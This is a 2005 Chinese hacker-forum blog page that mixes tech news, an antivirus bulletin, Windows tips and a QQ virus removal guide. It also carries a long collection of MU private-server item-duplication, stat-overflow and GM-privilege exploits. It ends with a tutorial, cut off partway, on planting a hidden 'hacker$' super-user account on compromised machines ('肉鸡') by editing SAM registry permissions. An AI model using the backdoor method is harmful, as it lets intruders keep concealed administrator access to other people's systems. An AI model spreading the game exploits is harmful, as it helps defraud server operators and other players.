黑客[中国]联盟
===========================================================
请注意!!!
===========================================================
“华人地带”网站诚邀有识之士和有能之才加入网站开发建设行列, 有意者请附上个人简历、专业说明及联系方式,发送到QQ:114804437 给我一个支点, 我就能撬动地球; 给我一次机会, 我就会让世界震惊! 自信可改变未来! 让我们携手共创辉煌明天! --------华人地带 宣
lingsui521 发表于:2005.05.28 18:55 ::分类: ( 最新信息 ) ::阅读:(72023次) :: 评论 (39)
===========================================================
Google“封杀”hao123 百度已发出“沟通函”
===========================================================
全球最大的搜索引擎Google上竟然找不到中国知名分类网址网站hao123的链接。昨天,记者在Google上遇到了这个怪现象,hao123网站的所有者百度公司表示,已经就此向Google发出了“沟通函”询问原因。

  昨天下午,当记者在Google上以“hao123”为关键词进行搜索时,竟然找不到这个国内知名分类网址网站的链接,之后记者尝试采用搜狗、中搜等国内其他搜索引擎搜索,hao123网站链接都出现在搜索结果的首页头条。

  据了解,hao123原本是国内著名个人网站,半年前由百度公司出资5000万元买下,专门为用户提供网址链接服务,目前该网站流量排名全球第15名。百度方面在接受记者采访时表示,他们也已经发现了这种异常情况,并已经向Goolge发出“沟通函”询问其中原因。耐人寻味的是,业界近日刚刚传出Google将设立中国办事处的说法,而此前著名调查公司艾瑞发布报告显示,在英文市场所向披靡的Google在中文搜索市场已经排在百度和雅虎之后。针对业内人士猜测这可能是Google出于中国市场竞争考虑,牺牲一直引以为傲的中立性来屏蔽对手网站的说法,由于Google目前在国内还没有公开的代表机构,记者目前尚未与Google取得联系。


lingsui521 发表于:2005.05.21 09:18 ::分类: ( 最新信息 ) ::阅读:(23286次) :: 评论 (6)
===========================================================
瑞星公司05月20日发布 每日计算机病毒及木马播报
===========================================================
据瑞星全球反病毒监测网介绍,今日有一个病毒特别值得注意,它是:“新CIH(Win32.Yami)”病毒。该病毒与CIH类似,通过感染可执行文件进行传播。病毒发作后会破坏硬盘数据和主板BIOS,造成用户的计算机无法启动,用户数据丢失。

本日热门病毒:

“新CIH(Win32.Yami)”病毒:警惕程度★★★★,文件型病毒,通过感染Windows可执行文件传播,依赖系统:WIN2000/XP。

“新CIH(Win32.Yami)”病毒会驻留在系统内核。病毒判断打开的文件是否为Windows可执行文件(PE)文件,如果不是则不进行感染操作,是则将病毒插入到PE文件各节的空隙中(与传统的CIH一样),所以,感染后文件长度不会增加。由于病毒自身的原因,感染时有些文件会被损坏,导致不能正常运行。它发作时将企图用“YM Kill You”字符串信息覆盖系统硬盘,并且使数据恢复相当困难。它同时通过向主板BIOS中写入垃圾数据来对硬件系统进行永久性破坏。“新CIH”病毒与CIH相比可以传染Win2000/XP系统,具有更强的传染性。

反病毒专家建议:建立良好的安全习惯,不打开可疑邮件和可疑网站;关闭或删除系统中不需要的服务;很多病毒利用漏洞传播,一定要及时给系统打补丁;安装专业的防毒软件进行实时监控,平时上网的时候一定要打开防病毒软件的实时监控功能。

如遇病毒,请拨打反病毒急救电话:010-82678800或访问瑞星反病毒资讯网:http://www.rising.com.cn。

lingsui521 发表于:2005.05.21 09:17 ::分类: ( 最新信息 ) ::阅读:(40250次) :: 评论 (3)
===========================================================
日本政府称有44名日本国民户籍设于钓鱼岛及竹岛
===========================================================
中新网5月18日电日本政府17日表示,有18名日本国民的户籍设于钓鱼岛,另有26名日本国民设籍于竹岛。

据台湾媒体发自东京的报道,日本和中国之间对钓鱼岛的领土归属,存有长期的争议;日本和韩国之间,对竹岛的主权问题,也有强烈争执。如今日本政府公开指称,这两处岛上都有日人登记户籍,是否会激化中韩两国的反应,值得观察。

日本政府17日接受在野的民主党众议院议员岩国哲人书面提问时,针对这些争议岛屿的住民问题,做上述回答。日本政府同时指出,这些人的籍贯虽设在各个岛上,但各岛上“并没有人”实际居住。

而韩国媒体曾报道,韩国国会议员准备将籍贯地迁至竹岛(韩国称独岛)。为此,日本政府说,日方已向韩国要求确认情况,如果属实,日本政府将要求韩方取消这项户籍迁移登记。


lingsui521 发表于:2005.05.21 09:16 ::分类: ( 最新信息 ) ::阅读:(94339次) :: 评论 (31)
===========================================================
超大免费空间!
===========================================================
免费200M到600M 空间支持:ASP,FTP,PHP,FSO等全能型空间 网通家家信息站 www.WTJJ.INFO 申请时请帮忙填下偶的名字:114804437 很容易申请的。谢谢大家帮顶下。 空间大小:200M到600M 空间支持:ASP,FTP,PHP,FSO等全能型空间 时间:免费使用到2007年5月1日 注:本次网站推广,主要是为热爱建站或已有网站并有一定流量的网友们提供空间 机会难得,请不要恶意申请!系统设置相同ip每天只可以申请一次。 网通家家信息站欢迎您 www.WTJJ.INFO
lingsui521 发表于:2005.05.07 00:38 ::分类: ( 最新信息 ) ::阅读:(14853次) :: 评论 (2)
===========================================================
开始→运行集锦!
===========================================================
开始→运行→输入的命令集锦 mstsc--远程桌面连接 logoff--注销命令 rononce -p --15秒关机 tsshutdn--60秒倒计时关机命令 iexpress--木马捆绑工具,系统自带 tourstart--xp简介(安装完成后出现的漫游xp程序) winchat--XP自带局域网聊天 sndrec32--录音机 Nslookup--IP地址侦测器 explorer--打开资源管理器 lusrmgr.msc--本机用户和组 services.msc---本地服务设置 oobe/msoobe /a--检查XP是否激活 notepad---打开记事本 cleanmgr--**整理 net start messenger--开始信使服务 compmgmt.msc---计算机管理 net stop messenger---停止信使服务 conf----启动 netmeeting dvdplay---DVD播放器 charmap---启动字符映射表 diskmgmt.msc---磁盘管理实用程序 calc----启动计算器 dfrg.msc--磁盘碎片整理程序 chkdsk.exe---Chkdsk磁盘检查 devmgmt.msc--- 设备管理器 regsvr32 /u *.dll--停止dll文件运行 drwtsn32---- 系统医生 rononce -p --15秒关机 dxdiag----检查DirectX信息 regedt32--注册表编辑器 Msconfig.exe---系统配置实用程序 rsop.msc--组策略结果集 mem.exe---显示内存使用情况 regedit.exe--注册表 progman---程序管理器 winmsd----系统信息 perfmon.msc--计算机性能监测程序 winver----检查Windows版本 sfc /scannow---扫描错误并复原 taskmgr---任务管理器(2000/xp/2003) wmimgmt.msc--打开windows管理体系结构(WMI) wupdmgr---windows更新程序 w脚本---windows脚本宿主设置 write-----写字板 winmsd----系统信息 wiaacmgr--扫描仪和照相机向导 mem.exe---显示内存使用情况 Msconfig.exe---系统配置实用程序 mplayer2--简易widnows media player mspaint---画图板 mplayer2--媒体播放机 magnify---放大镜实用程序 mmc-----打开控制台 mobsync---同步命令 dxdiag----检查DirectX信息 drwtsn32---- 系统医生 devmgmt.msc--- 设备管理器 dfrg.msc--磁盘碎片整理程序 diskmgmt.msc---磁盘管理实用程序 dcomcnfg--打开系统组件服务 ddeshare--打开DDE共享设置 dvdplay---DVD播放器 net stop messenger---停止信使服务 net start messenger--开始信使服务 notepad---打开记事本 nslookup--网络管理的工具向导 ntbackup--系统备份和还原 narrator--屏幕“讲述人” ntmsmgr.msc--移动存储管理器 ntmsoprq.msc---移动存储管理员操作请求 netstat -an--(TC)命令检查接口 syncapp---创建一个公文包 sysedit---系统配置编辑器 sigverif--文件签名验证程序 sndrec32--录音机 shrpubw---创建共享文件夹 secpol.msc---本地安全策略 syskey----系统加密,一旦加密就不能解开,保护windows xp系统的双重密码 services.msc---本地服务设置 Sndvol32--音量控制程序 sfc.exe---系统文件检查器 sfc /scannow---windows文件保护 taskmgr---任务管理器 eventvwr--事件查看器 eudcedit--造字程序 explorer--打开资源管理器 packager--对象包装程序 perfmon.msc--计算机性能监测程序 progman---程序管理器 regedit.exe--注册表 rsop.msc--组策略结果集 regedt32--注册表编辑器 regsvr32 /u *.dll--停止dll文件运行 regsvr32 /u zipfldr.dll----取消ZIP支持 cmd.exe---CMD命令提示符 chkdsk.exe---Chkdsk磁盘检查 certmgr.msc--证书管理实用程序 calc----启动计算器 charmap---启动字符映射表 cliconfg--SQL SERVER 客户端网络实用程序 Clipbrd---剪贴板查看器 conf----启动netmeeting compmgmt.msc---计算机管理 cleanmgr--**整理 ciadv.msc----索引服务程序 osk-----打开屏幕键盘 odbcad32--ODBC数据源管理器 oobe/msoobe /a--检查XP是否激活 lusrmgr.msc--本机用户和组 Nslookup--IP地址侦测器 fsmgmt.msc---共享文件夹管理器 utilman---辅助工具管理器 gpedit.msc---组策略
lingsui521 发表于:2005.05.06 22:15 ::分类: ( 实用技术 ) ::阅读:(51761次) :: 评论 (32)
===========================================================
最新QQ病毒手动杀毒方法
===========================================================
最近老是有朋友。给我说这样那样的Q病毒。自动发送文件的病毒。 这种病毒连独孤剑客的QQ病毒专杀工具都不能解决。因为他不算长驻内存的。 研究了一下,其实也比较简单。 *手动删除病毒* 1.查找进程rundll32.exe k掉 2.如果有 .exe(注意是一个特殊字符不是空格)进程,k掉 3.定位[HKEY_LOCAL_MACHINESOFTWAREClassestxtfileshellopencommand] 改默认键值为 "notepad %1" (注意前面没有那个类似于空格的特殊字符) 4.定位[HKEY_LOCAL_MACHINESOFTWAREClassesexefileshellopencommand] 改默认键值为 "%1" %* (注意前面没有那个类似于空格的特殊字符) 5.定位[HKEY_LOCAL_MACHINESOFTWARETENCENTQQ] 得到你的qq目录,再转到你的qq目录下 可发现 有两个文件 TIMPlatform.exe TIMP1atform.exe (注意是1不是L) 删除TIMPlatform.exe(病毒,为winrar图标),把TIMP1atform.exe改名为TIMPlatform.exe 6.病毒文件删除,下面是要删除的病毒文件(都为winrar图标),假设windows目录为c:winnt c:winntsystemrundll32.exe c:winntsystem32.exe c:winntsystem32notepad.exe *为你的系统打上此病毒"补丁"* 打此补丁后以后不会再中此病毒 定位注册表项(没有则新建) HKEY_LOCAL_MACHINESOFTWAREClassesMSipv 添加一键值 MainVer 类型为REG_DWORD,值为ffffffff(16进制) 病毒启动判断状态参数完毕后会查询此值,如当前版本值比它小则会弹出个对话框就退出。 我得到的病毒版本值为505
lingsui521 发表于:2005.04.27 20:28 ::分类: ( 实用技术 ) ::阅读:(22868次) :: 评论 (24)
===========================================================
菜鸟电脑操作技巧60招
===========================================================
 1.如果同时有多个窗口打开,想要关闭的话,可以按住shift不放然后点击窗口右上角的关闭图标.   

  2.在保存网页前,可以按一下"ESC"键(或脱机工作)再保存,这4婧芸?   

  3.用电脑听CD可以不用任何的播放软件,把音箱线直接接到光驱的耳机孔,放入CD,按光驱上的play键就可以直接听了,这样听歌可以不占用系统资源。(如果你的电脑坏了,不能启动或什么的,一时放在那不能修,千万不要浪费资源,把用里面的电源给光驱通上电,就可以暂时做CD机了.   

  4.MSN中发消息的时候是按enter的,如果想要换行而不想发出消息,可以 shift+enter或ctrl+enter   

  5.浏览器的地址栏里可以调试简短的HTML代码。方法如下:地址栏写 about :abc 回车,就看到效果了.   

  6.Windows快捷键:

  win+m 显示桌面

  win+pause 系统属性

  快速重新启动:按确定前先按shift(不适用于2k、xp).

  彻底删除:shift+del

  不让光盘自动运行:按shift

  Ctrl+Esc:相当于"开始"或WIN键

  Ctrl+Home:将游标移至文字编辑区的开始始(Home单用:移至列首)

  Ctrl+End:将光标移至文字编辑区的终点(End单用:移至列尾)

  Alt+F4:关闭当前视窗(若是点一下桌面再按则为关机)

  F2:更改名称

  windows+e 资源管理器.

  windows+r 运行.

  windows+f 查找.

  windows+u 关闭系统.

  windows+d最小化所有窗口,再按一次Win+D可回到最小化前的窗口.

  windows+m最小化所有窗口,但再按一次无法回到最小化前的窗口.

  Shift+F10,可以打开所选项目的右键菜单.

  按住 CTRL+SHIFT 拖动文件:创建快捷方式.   

  7.关机快捷方式

  (1). 在桌面空白位置按鼠标右键 -> <新建> -> 选<快捷方式>

  (2). 在<指令行>键入 rundll.exe user.exe,exitwindows

  (3). 在<选择快捷方式 的名称>键入<关闭Window>或你想要的名称 -> 按<完成 >   

  8.重新启动快捷方式

  (1). 重复以上 (1)

  (2). 在<指令行>键入 rundll.exe user.exe,exitwindow***ec

  (3). 在<选择快捷方式的名称>键入<重新启动Restart>或你想要的名称 -> 按< 完成>   

  9.RUN - > cmd 或者command

  就会看到DOS窗口。不知道大家注意到那个小小的图标没有,在左上角。

  点击这个图标, 就会看到下拉菜单, 尤其是Edit下的一些功能, 很方便   

  10.con、nul是MS系统的保留名,它不能做为文件名!检查你的web空间是不是M 系统,可以建一个con的文件夹试试

        11.想把自己的某个文件夹的文件做一个列表? 用什么软件呢? 不用,直接在命令 行下输入 "tree /f > index.txt".打开index.txt看一下是不是一目了然   

  12.保存无边窗口页面请用CTRL+N新开窗口

  13.如果一个文件夹下有很多文件,如果想快速找到想要的文件,先随便选择一个 文件,然后在键盘上选择想要的文件的第一个字母就可以了   

  14.说个QQ隐身登陆的笨办法:

  在网吧上网,如果直接从注册向导登陆的话QQ是上线登陆的,可是有时候却不 希望现身,怎样实现隐身登陆呢?

  就是拿一个没用的QQ先从注册向导登陆了,选择状态为隐身,然后在系统参数 中选中以隐身方式登陆,点确定,然后直接在这个QQ上运行注册向导登陆你要 登陆的QQ,你会发现现在QQ是隐身的了。

  15.win98改ip不重启的办法:

  1.改完ip选择取消。

  2.在设备管理器里禁用改了ip的那块网卡。

  3.启用网卡。

  ok,你改的ip已经可以用了   

  16.2000和xp下运行"cmd",进入dos窗口,复制和粘贴都用右键完成   

  17.收藏夹不要放在系统盘,以免忘了备份,每次装完系统用"超级魔法兔子“指 定路径   

  18.对于系统不明白的地方,平时多看windows自带的帮助,不要盲目去找人解决 ,也许帮助才是最快和最全的。(其余软件也是同理)   

  19.winxp自带批量重命名功能,只要选中一堆文件,选重命名,然后改第一个文 件,改完后,其他文件也会自动修改

  20.上网时在地址栏内输入网址,系统会记录下来,虽然方便以后不用再重复,不 过如果是公用的机子,又不想让别人知道自己到过哪些地方,可以用“CTRL+ O(字母O,不是0)”,这时对弹出一个“打开”对话框,在其中的地址栏内 输入网址,就不会被记录下来了.


lingsui521 发表于:2005.04.26 21:20 ::分类: ( 推荐文章 ) ::阅读:(55500次) :: 评论 (8)
===========================================================
最新奇迹私服复制漏洞大全(含98c)
===========================================================
声明:照本文做后出现数据溢出、删档等后果,本站一概不负责!
0.98版本漏洞
=======★★★关于0.98c的复制方法★★★=====
复制必须要两个人,假如主角是A 对方是B
A按ESC键 B交易A 交易两次 第二次交易要在第一次交易取消以后 等B交易完之后 A先点OK 再点取消 然后把要复制的东西放入仓库 接着A回来交易B
B点OK A走开 复制成功 你会发现你放到仓库的东西又重新出现在你的包裹里 注意:不要把复制的东西和真品同时放在包裹或者仓库,不然后果不堪设想 不信你们自己可以试试 如果有人知道0.98c怎么刷卓越全属性装备请加我QQ8549128请告之,谢谢!

三连击

决斗系统所设定的60%普通攻击有效,再加上战士COMBO的三连击
想想是多么恐怖,一个天地十字剑+霹雳回旋+袭风刺(双重伤害),最后附加激活的combo总攻击。能上1000的伤害。当然不一定在使用的过程中能全部打中,因为对方可以跑
但是如果他跑的话,他就根本没办法打死你。
而其他职业只能继续保持原来的攻击方式,因为只有60%的攻击力,所以对于上1000血的+11黑凤凰战士只能是隔靴挠痒!
法师瞬移PK,那根本就打不死人!
精灵的冰封有点威胁!
战魔根本咬不动!

三连击图

决斗系统最大受益者-战士!
最后的一击太猛了!没上千血的被最后一击打中,必死!
另外,霹雳回旋变弱了,以前对在身边的怪物用霹雳,会有2个伤害,现在只有一个了。

的确是个很大的BUG.袭风刺现在的威力很大.消耗的技能值变少好多,几乎可以无限使用.有时是2次伤害3次伤害..稍微强点的战士赶快去城堡和敏弓枪城堡任务吧.袭风刺一定不会让你们失望的~~

☆版主提示:或许有人问3连击是怎么设定的?是你使用的武器本身技能+霹雳回旋+袭风刺或雷霆~来设定的

===============================★★★0.98C复制方法★★★================(此法适合官方,强烈推荐)

本站声明:因复制出现数据溢出、删档等后果,本站一概不负责!相关技术问题请咨询作者或到留言板留言!


关于用99复制的问题99可以实现2次交易,不用和任何人说话的,B交易A,A用99奇迹,等B屏幕上显示交易取消的时候B再交易A,然后A点确定,就可以了,B把要复制的东西存仓库,但是现在问题就出现在这里了,我也不知道怎么办,大家研究下,问题就是B不能和别人交易了,即使A交易B,B点了确定,还是取消了交易,哎,还欠东风,大家想想办法啊,大家共享一下嘛~别小气哦

0.97-0.97D版本漏洞

==============★★★0.97以及旧版本,复制方法★★★=========

要复制物品者为A,补助设置者为B,必须可以用0.97版外挂方可使用复制方法
1:A去仙踪林,点卡隆出现对话
2:B一直交易A,并且要快,一直到A那出现交易提示。这时A选确认,不过还有个交易提示,第2个要选取消。A取消交易界面,但是B的交易栏必须还在,否则失败。
3:A取消交易,B不要取消交易,也不要动,B的交易栏还在的。这时A取消交易后就能动了,去仓库,把A要复制的东西存进去。
5:回去交易B,B点确认,然后A或B取消交易,复制成功
(点守卫,大天使使者,咔隆,都能复制)

0.97以前版本物品复制方法II:
1:A去仙踪林,点玛雅葛布林交易,出现对话框按V
2:B交易A,等到A那出现交易取消。在交易A(要快!)这时A选确认,不过还有个交易提示,第2个要选取消。A先取消交易,然后B再取消交易
3:这时A取消交易后就能动了,去仓库,把A要复制的东西存进去。
4:回去交易B,A,B同时确认就OK了.
其实可以同步的,B把要复制的东西放在身上在第2步完成后把要复制的东西放进仓库,然后和A确定.这就是2个人同时复制,效率提高!

关于奇迹私服复制问题解答:

1:复制物品是不需要开外挂的,只要不是0.97B都能复制
2:如果GM大概物品检测,你复制东西动了掉线,请卖到商店。
3;并不是什么物品都检测到的,大部分是无法检测到~!
===★玩家01036的另类复制方法:

方法一:A,B。 A交易B,B不要确定,访问卡隆的同时,A再交易B,A点确定。然后放些垃圾在交易栏上。A不要点取消,开仓库,B访问卡隆,A把东西放进去,走两步,再看看身上,复制成功。这是回档法复制!
方法二:注册两个中文账号,账号为10个中文,同时登陆服务器,两个仓库是一样的。
方法三:两个人利用交易超时。。。我也不是很清楚知道的补充一下。
希望大家不要太自私,出现了问题,不要逃避,让大家来共同研究,共同解决。

================★★★杀人不红名★★★==作者:永恒的法师

在盟战结束后.可以继续杀对方盟里的人而不会红名=
比如 我方以20:10赢了对方后..杀一次对方盟主.分数变成22:10, 战盟的SCORE也会再+1..可以一直杀几次(时间不能太长)

================★★★GM命令★★★=====

此方法因个别私服而异=本页下面有GM命令最新资料
我就知道几个啊 ,大家别笑话(设定GM是A, 一普通玩家为B):
1。/追踪 B=奇迹漏洞网http://allbug.xicp.net提供
2。/move A(或者B) 3 15 15 :3 代表地图仙踪林,15 15是一个坐标
我只知道地下的代码是1,冰的代码好象是2。城堡的 代码分别是11,12,13,14,15,16
3。!大家好 为发表公告:大家好
补充:GM的移动指令为 /移动 本人名字 地图代码 众坐标 横坐标

================★★★转生漏洞★★★===

最近玩东方的时候无意中发现了一个无限点数的BUG,找一个可以在线加点的SF,等点数够在线加点时候,下线,进入在线加点程序,分配好点数,然后就狂点提交,注意,不要点的太多,太多了回变负数的,好象是3W以上就变负数,我朋友试过,我一发现这个BUG后,就马上练了个小号,让朋友带我进了次血城,出来后就刷点,才一个小时,20000的敏捷,25000的智力,血你怎么杀都杀不完的超级BT妹妹就出来了,哈哈~~~天魔都打不动我,不过才玩了一天,我的帐号就封了,有风险,各位想玩,就再注册个小号玩玩吧,

==============★★★法师穿MM装备衣服漏洞★★★=====

首先你必须有个华人外挂!接着你用自动登入先登入一个人物(角色1),接着在自动登陆里换人物(角色2),点回到角色画面外挂自动登上去!想让别的职业穿不同的装备 前提是 角色1和角色2不同职业!可以用这个漏洞让1级的新人可以M别人 可以交易嘿嘿!

================★★★马和彩云兽的小漏洞★★★=====

有的私服没有卖马和彩云兽的吧!还有玛雅比较贵!
这样自己合成个彩云兽死了!就太浪费了!如果你那的祝福灵魂比较便宜那!那就好办了!先把彩云去血,一般去8点血以上就行了~
然后做个阴影点彩云~彩云每+1彩云的血就会比以前多了1点血点到+7~去他8点血足够了吧!当然去多了也没事只要不死就行了!然后你那去使用吧!只要彩云不死我们就能让他加血!你看到彩云少与7点血的时候~再去做个阴影~用灵魂点暴他~变+0的~彩云是不是有变很多血了那?
还有如果你感觉彩云的属性不好用生命贴吧!就是没有属性的也能贴出属性来!!属性感觉不好就继续贴贴到喜欢的属性为止!!!!
PS:做阴影其实很简单!只要你机器不卡!私服卡不卡没关系!不卡更好!你去买个能点祝福的东西!把东西卖了的时候迅速点回物品所在的地方!一定要点原来在你背包的为止点正一点不错啊!100%能做出阴影!!
没事你点点恶魔看看+7的比较好看点~亮了一点~但必须要先去他8点血啊!

==============★★★法师的无敌守护+血法★★★====

前提是守护够140%(具体多少我不太清楚,140肯定行)吸收伤害,给自己+上守护后找人狂打你,会发现你的血量激增(我的没有+过体力的法师,被朋友用爆炎砸到了14万血)这个时候就可以轻易的杀死反射战士了。具体你现在有多少血要从你的组队看(P键打开)。在你杀人的时候,可以叫朋友不停的攻击你,因为这种血两的增加是暂时的,很快回消失。另外同理,你也可以给朋友套个守护再一直攻击他,把你的朋友也变成超级血牛。
==============★★★法师反射杀人法★★★==作者:拎壶冲

法师反射杀人法(此方法纯属朋友口述,没有尝试)140%的伤害吸收守护,要求至少有5000敏捷,5000智力。穿全套的反射革装,带的首饰不能带回血,另外要求有一定的血量。套上守护以后。任由别人打你。自己不受伤害,对手却要受到反射。

☆版主的话:次漏洞尚没通过完全验证,望测试得到的朋友到论坛发贴

=============★★★几个小漏洞发现★★★==

据作者君然了解到:点门票那个和魔剑士那个就是到了98也应该可以用
1,魔剑士用能量球:有变身功能的服,现在转成法师然后转魔魔就会能量球了
2,万能门票:用个幸运的东西做影子把门票点到9就变+0的了(万能!)
3,新翅膀合成100%:在服务器最卡的时候合,最好是随便合个东西都要闪2,3分钟的时候合成是不会失败的(我在龙之魄21%的成功率就合了 97版的时候合的)
不过不出好属性不知道为什么

==============★★★GM代码和相关内容★★==


打开SQL中表character,更改你的人物的 CtlCode值为 8,就是GM号了
设置了GM号,想自己移动就输入/move GM名字 地图编号 X坐标 Y坐标就行了。例如移动去勇者大陆
/move 我是GM 0 100 100,就是把我是GM移动到勇者大陆100,100的坐标。
CtlCode代码的意义
0 普通角色(此角色可以使用)
1 被封角色(此角色无*使用)
2 物品角色(此角色可以使用,但身上物品无*转移)
4 隐形角色(此角色可以使用,只有自己看着隐形,别人能看见)
8 管理员角色(此角色可以使用,具有管理员权限,可以用GM命令)
(转自wily2000,感谢)


GM代码

其他的代码只是这些代码的组合,如6=2+4(无*转移物品的隐型角色),10=8+2(无*转移物品的管理员角色),12=4+8(隐型的管理员角色),14=2+4+8(无*转移物品的隐型管理员角色)

/停权
/解除停权
/guidemove 战盟移动 /GuildMove 战盟名称 地图编号 坐标X 坐标Y
用*和/move一样,但这个是把当前在线的战盟成员全部移动到你指定的地方,这样,GM就可以把两个盟的人召集在一起,在你的监督下进行盟战或其它活动了!(谢谢ydll)
/guideend 战盟禁止
/warend 战斗结束
/制造 (用*未知)
/连线状态 (显示在线人数) /连线状态 等级-等级
/追踪 移动到人物身边 /追踪 名字
/监视 显示为乱码 /监视 名字
/Disconnect 断开连接(踢人)
/Move 移动任意角色到指定位置 /Move 名字 地图编号 坐标X 坐标Y
// 地图号: 0:勇者大陆, 1:地下城, 2:冰风谷, 3:仙踪林, 4:失落之塔, 5:未知地图(move会出错), 6:竞技场, 7:亚特兰蒂斯 8:沙漠 9:恶魔广场 10:天空 11:血色城堡 11血1 12血2 依此类推
/Trans (不明白)
/SetBlock 封号
/UnsetBlock 解封
/DisableChat 禁止聊天
/EnableChat 允许聊天
/GuildMove
/GuildDisconnect 战盟断开
/GuildWarEnd 盟战结束
/GuildWarStart 盟战开始
/GuildWarStop 盟战停止
/Make 制造(用*未知)
/RemainTime 剩余时间

==========★★★外挂飞入罗马竞技场漏洞★★★=========
进入竞技场(/移动 竞技场)后 用外挂移动到 30 40这个地方 就可以进入古战场了 里面好华丽的~用外挂的话 就飞到很大的空白的地方 看到没有烟雾了(机器也不卡了) 就对了不用外挂的话 要2个盟主 开盟战 靠墙 杀了对方可能会传送过去哟

==========★★★MU在线加点N大的BUG★★★=============

大家应该知道以前的在线加点BUG~在前面打上负号就可以了但是这个BUG已经不能用了~经过本人的长时间研究~终于~知道了~

在在线加点的4个格子里每个打.99999 不但不减自己拥有的点数~还各个技能+1唯一缺点~费钱啊。。。。。。。。。。。。。。。。。。。。大家先试试好用不好用~

=========★★★刷祝福碎片方法★★★=====     (某些私服可以使用)

贴这个漏洞时候~唉~已经过时了~不好意思啊~但也得贴出来~~ 方法就是用祝福点奇迹通宝变祝福碎片~方法就是这么简单

===========★★★MM带弓再拿武器的双手漏洞★★★=====

适用与0。98版本以下(0。98私服版本没试过)
确定MM身上装了弓(列如:玛雅神弓 比较靓) 接着准备一把可以使用的单手武器放在道具栏里(列如:雷神之剑 亮。。) 接着找一个人你打/交易(事先说好叫那人什么都别按)接着出现了你向XX提出交易,这时马上按I打开道具栏把装备在身上的神弓拿起别放下,等待申请交易超时自动取消,接着你发现了你的神弓“不见了”(还在!只是你自己看不见) 接着装上事先准备好的单手武器!OK!下线在上登陆人物画面的时候别惊讶! P。S:注意必须是弓类武器放(右边)
必须是单手武器(左边) 此法还可以卡天马 卡小马 可以骑天马放技能(别人看的见) 带翅膀的战士骑天马(卡没了)可以直接放出流星焰
此法最原始的开始于卡盾年代

===========★★★靠墙方向移位漏洞★★★=====

任何版本!
座姿矫正。。。-_-!!
先准备一个变身戒指(骷髅兵的免),在大陆有铁栅栏可以靠上去, 开始分解动作
1。人靠上去
2。带上戒指
3。鼠标朝任意方向摆 主要让自己方向变化
4。取下戒指!
哈哈你的PP对别对着别人哦!

☆版主蓝翼补充:冰的177 34靠门大柱子靠上去居然是空1个格子的

   

=================================★★★0.97B和0.97D的复制方法★★★=====================(推荐)

有3个方法,本站搜索期间比较辛苦,转贴请著名来源网站。这3个方法基本相同,相关技术问题请与作者联系!复制时候建议用这3个方法联合一起~

本站声明:因复制出现数据溢出、删档等后果,本站一概不负责!

第1个方法 (此法支持0.97B的复制)

D版复制方法

要等血色或者广场开门的时候。要2个人。

A。是拿着要复制的装备。帮装备放到包包里,然后点激卡隆或者大天使。等进入广场或者血色的对话框出现了。然后B立刻交易A。A选交易。然后就点激你可以进入的层次。一般都是满人。然后B的画面里就出现了交易栏。A就不用管它。走去仓库,把要复制的东西放进仓库里面。然后B就取消交易。跟着A交易B,出现交易栏之后。A按取消交易。

这样。要复制的装备又在你的包包里出现了。这就成功了。

第2个方法

我的复制也是从别人那学来的,适合0.97D,只要两个人。是很简单的那种,至于我个人
没什么建树(嘿嘿)。我的复制方法是:

在血色或者广场开的5分钟内进行复制,(时间很紧,要抓紧)[前提:进血几要带加几的
披风;进广场嘛,带个加0的卷就可以了]

方法===A带要复制的东西和披风(或卷)点大天使(或卡龙),这个时候出现一个选择进
血色几(或广场)的框,先不要点,这时候由B交易A,A点确定,再进该去的层数,这时
候A会被大天使反弹出来,就马上回仓库,把要复制的东西放仓库,这个期间B不能动,直
到A把要复制的物品存储完毕,然后走动,B交易A,都按确定,A再看包裹,嘿嘿,复制成
功。

切记:原物品和复制品不能放在同一物品框。。。。。。。。

第3个方法

要3个人.假定复制人为A.帮手为B C

血城开门时.A点大天使使者.(身上要有相符的票)出现进入选择时.B交易A.A先OK.这时B上出现交易栏.而A还是进入血城的界面.A点进入的血城层数.这时会被弹出来.有时会乱飞.没事.用移动命令移动一下.然后把要复制的装备放仓库.关闭仓库后.C交易A.A选确定.出现交易栏后.A取消交易..B再取消就行了.整 个过程中.B要一直=到A和C的交易取消后才能点取消.否则会失败.此方法可以刷箱子.我经常打满仓+5箱子.然后再扔.手快可以扔2~3次.当然.我都是到失落这些没人的地方扔了.扔箱子的话 C要先和A组队.方便捡物.只要打一次箱子.永久使用.而且就算开了复制也没用.原本的已经扔了.扔出的物品都是不同的.当然不算是复制品.

也可以刷钱.对关了刷钱的服务器.我是合好几个新飞飞.全点9~16.把放仓库这步换成卖NPC就行了.C一交易取消后.翅又回来了. 不过要注意带的钱的限制.我第一次刷时太狠了.过了20亿.(5个飞.其中一个XY.一个+S其它普通的.)成了负数的钱了..而且卖东东更快.开一次血或广场的5分钟可以卖N次.几个人轮着刷.全成了有钱人

lingsui521 发表于:2005.04.26 21:15 ::分类: ( 黑客教程 ) ::阅读:(8506次) :: 评论 (1)
===========================================================
建立隐藏的超级用户多种方法
===========================================================

建立隐藏的超级用户多种方法

作者:黑客基地 | 文章来源:本站原创 | 点击数:1070 | 更新时间:2005-3-26

一、如何在图形界面建立隐藏的超级用户
图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为windows2000有两个注册表编辑器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序,修改键值的权限时在右键中点"权限"来修改。对regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM键下,但是除了系统用户SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为"完全控制"权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下:
1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户
net user hacker$ 1234 /add
2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。
3、点"权限"以后会弹出窗口
点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为"完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。
4、再点"开始"→"运行"并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。
